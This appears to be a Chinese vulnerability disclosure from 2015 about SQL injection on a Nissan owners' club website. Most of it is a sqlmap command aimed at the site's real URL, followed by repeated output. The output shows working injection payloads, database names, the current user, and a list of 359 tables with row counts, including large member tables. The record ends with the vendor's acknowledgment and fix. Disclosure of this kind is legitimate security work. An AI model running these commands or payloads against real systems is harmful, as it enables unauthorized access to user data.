2015-11-18: 细节已通知厂商并且等待厂商处理中 2015-11-20: 厂商已经确认,细节仅向厂商公开 2015-11-24: 厂商已经修复漏洞并主动公开,细节向公众公开
sqlmap -u "http://club.zznissan.com.cn/fenbu/album.php?cls=1'%22&keyword=&page=2" --dbms=mysql --tamper=between --level=5 --risk=3
参数:cls
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: cls Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: cls=-2754' OR (7970=7970) AND 'ABtb'='ABtb&keyword=&page=2 Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause Payload: cls=-2765' OR (SELECT 7906 FROM(SELECT COUNT(*),CONCAT(0x716a697271,(SELECT (CASE WHEN (7906=7906) THEN 1 ELSE 0 END)),0x716e6a7371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EZrq'='EZrq&keyword=&page=2 Type: UNION query Title: MySQL UNION query (random number) - 11 columns Payload: cls=-1976' UNION ALL SELECT CONCAT(0x716a697271,0x706a744672674c484469,0x716e6a7371),2675,2675,2675,2675,2675,2675,2675,2675,2675,2675#&keyword=&page=2 Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: cls=-4280' OR 1288=SLEEP(5) AND 'Ydqy'='Ydqy&keyword=&page=2---web application technology: Apacheback-end DBMS: MySQL >= 5.0.0current database: 'paladinclub'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: cls Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: cls=-2754' OR (7970=7970) AND 'ABtb'='ABtb&keyword=&page=2 Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause Payload: cls=-2765' OR (SELECT 7906 FROM(SELECT COUNT(*),CONCAT(0x716a697271,(SELECT (CASE WHEN (7906=7906) THEN 1 ELSE 0 END)),0x716e6a7371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EZrq'='EZrq&keyword=&page=2 Type: UNION query Title: MySQL UNION query (random number) - 11 columns Payload: cls=-1976' UNION ALL SELECT CONCAT(0x716a697271,0x706a744672674c484469,0x716e6a7371),2675,2675,2675,2675,2675,2675,2675,2675,2675,2675#&keyword=&page=2 Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: cls=-4280' OR 1288=SLEEP(5) AND 'Ydqy'='Ydqy&keyword=&page=2---web application technology: Apacheback-end DBMS: MySQL >= 5.0.0current user: 'paladinclub@localhost'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: cls Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: cls=-2754' OR (7970=7970) AND 'ABtb'='ABtb&keyword=&page=2 Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause Payload: cls=-2765' OR (SELECT 7906 FROM(SELECT COUNT(*),CONCAT(0x716a697271,(SELECT (CASE WHEN (7906=7906) THEN 1 ELSE 0 END)),0x716e6a7371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EZrq'='EZrq&keyword=&page=2 Type: UNION query Title: MySQL UNION query (random number) - 11 columns Payload: cls=-1976' UNION ALL SELECT CONCAT(0x716a697271,0x706a744672674c484469,0x716e6a7371),2675,2675,2675,2675,2675,2675,2675,2675,2675,2675#&keyword=&page=2 Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: cls=-4280' OR 1288=SLEEP(5) AND 'Ydqy'='Ydqy&keyword=&page=2---web application technology: Apacheback-end DBMS: MySQL >= 5.0.0available databases [3]:[*] information_schema[*] paladinclub[*] testsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: cls Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: cls=-2754' OR (7970=7970) AND 'ABtb'='ABtb&keyword=&page=2 Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause Payload: cls=-2765' OR (SELECT 7906 FROM(SELECT COUNT(*),CONCAT(0x716a697271,(SELECT (CASE WHEN (7906=7906) THEN 1 ELSE 0 END)),0x716e6a7371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EZrq'='EZrq&keyword=&page=2 Type: UNION query Title: MySQL UNION query (random number) - 11 columns Payload: cls=-1976' UNION ALL SELECT CONCAT(0x716a697271,0x706a744672674c484469,0x716e6a7371),2675,2675,2675,2675,2675,2675,2675,2675,2675,2675#&keyword=&page=2 Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: cls=-4280' OR 1288=SLEEP(5) AND 'Ydqy'='Ydqy&keyword=&page=2---web application technology: Apacheback-end DBMS: MySQL >= 5.0.0Database: paladinclub[359 tables]Database: paladinclub+------------------------------+---------+| Table | Entries |+------------------------------+---------+| memberawoke | 2997714 || oneq_missiondata | 1822433 || memberpay | 174554 || membermodify | 139384 || pw_members | 100189 || pw_usercache | 87618 || pw_members123 | 74523 || pw_memberdata | 63917 || carinfo | 55829 || memberinfo | 51367 || pw_ms_messages | 51267 || pw_ms_relations | 45781 || pw_ms_configs | 39840 || pw_merge_posts | 38559 || pw_posts | 38559 || pw_membersnew | 38251 || pw_members0705 | 38249 || east2008_loginrecord | 36497 || east2008_answer | 32599 || pw_msg | 28369 || pw_msgc | 28368 || pw_memberinfo | 26760 || pw_adminlog | 22134 || pw_datanalyse | 18747 || dakar2006 | 14392 || dakar20061 | 14391 || dakar20062 | 14091 || dakar20063 | 14091 || pw_attachs | 13050 || fankui | 12826 || pw_member_behavior_statistic | 10677 || pw_merge_tmsgs | 10531 || pw_tmsgs | 10531 || pw_threads | 10526 || eastgames_notify | 7550 || pw_medal_award | 6863 || memberinfo_t | 6236 || imagefile | 5411 || pw_cache_members | 5315 || pw_statistics_daily | 5180 || east2008_user | 4739 || pw_membercredit | 3737 || pw_permission | 3736 || pw_areas | 3550 || pw_ipstates | 3235 || pw_school | 2428 || article | 2370 || pw_wordfb | 2002 || pw_ucnotify | 1968 || pw_weibo_relations | 1494 || pw_filter | 1472 || pw_tags | 1442 || pw_weibo_content | 1141 || pw_forumlog | 1110 || oneq_mission | 1105 || memberinfo_bak | 1049 || pw_elements | 908 || membermark | 808 || pw_ms_replies | 663 || pw_ms_searchs | 658 || lmsj | 603 || dakar | 537 || memberinfo1 | 456 || pw_config | 379 || pw_attention | 345 || pw_activityfield | 340 || hk_article | 315 || wqw_city | 301 || pw_invoke | 300 || pw_invokepiece | 246 || hk_class | 232 || imgcategory | 232 || pw_friends | 183 || pw_cachedata | 145 || pw_recycle | 142 || pw_cache | 137 || pw_topicfield | 128 || czhd_memberinfo | 114 || pw_medal_log | 114 || pw_smiles | 111 || pw_pageinvoke | 110 || pw_hack | 99 || pw_space | 90 || xunlianying | 85 || userfun | 70 || pw_diary | 69 || pw_poststopped | 67 || pw_clientorder | 65 || pw_cnphoto | 54 || category | 52 || pw_ouserdata | 51 || pw_medal_apply | 48 || pw_nav | 46 || user_bak | 41 || huikan | 36 || pw_administrators | 36 || pw_report | 36 || `user` | 34 || pw_draft | 34 || pw_tagdata | 33 || prov | 31 || pw_advert | 31 || pw_collection | 31 || wqw_prov | 31 || pw_pcfield | 30 || pw_company | 28 || pw_user_career | 28 || pw_block | 27 || pw_help | 27 || clubinfo | 26 || pw_cnalbum | 23 || pw_membertags_relations | 23 || pw_pinglog | 23 || east2008_question | 22 || pw_rateconfig | 22 || pw_write_smiles | 22 || pw_forumdata | 21 || pw_forums | 21 || pw_modehot | 21 || pw_tpl | 19 || file_flow | 18 || pw_medal_info | 18 || pw_usergroups | 18 || khly_hz | 17 || pw_activitymodel | 17 || pw_membertags | 17 || pw_topictype | 16 || pw_voter | 16 || pw_searchforum | 15 || pw_user_education | 15 || file_info | 14 || east2008pho_loginrecord | 13 || pw_favors | 13 || pw_forumsextra | 13 || xly_user | 13 || pw_tools | 12 || pw_customfield | 11 || pw_medalslogs | 11 || pw_job | 10 || pw_medalinfo | 10 || pw_overprint | 10 || paladin_awards | 9 || pw_home | 9 || usergroup | 9 || pw_plan | 8 || pw_styles | 8 || pw_topicmodel | 8 || pw_cnskin | 7 || pw_debateclass | 7 || pw_stopicblock | 7 || pw_cnlevel | 6 || pw_medaluser | 6 || pw_polls | 6 || pw_stamp | 6 || pw_tpltype | 6 || cj_jl | 5 || pw_actions | 5 || pw_banuser | 5 || pw_datastore | 5 || pw_stopiccategory | 5 || pw_topiccate | 5 || a_user | 4 || file_share | 4 || pw_activitycate | 4 || pw_adminset | 4 || pw_cnclass | 3 || pw_cnstyles | 3 || pw_kmd_spread | 3 || topic | 3 || a_customers | 2 || a_floor | 2 || dakar_config | 2 || east2008pho_user | 2 || pw_channel | 2 || pw_comment | 2 || pw_diarytype | 2 || pw_forumtype | 2 || pw_modules | 2 || pw_portalpage | 2 || pw_searchstatistic | 2 || pw_sharelinkstype | 2 || `language` | 1 || pw_activity | 1 || pw_actmember | 1 || pw_bbsinfo | 1 || pw_cmembers | 1 || pw_colonys | 1 || pw_credits | 1 || pw_filter_class | 1 || pw_friendtype | 1 || pw_invitecode | 1 || pw_mpageconfig | 1 || pw_oboard | 1 || pw_pidtmp | 1 || pw_postcate | 1 || pw_task | 1 || pw_toollog | 1 |+------------------------------+---------+
参数过滤
危害等级:中
漏洞Rank:10
确认时间:2015-11-20 11:16
漏洞已收到,谢谢!
2015-11-24:废弃的这套系统已经下线处理。
真巧啊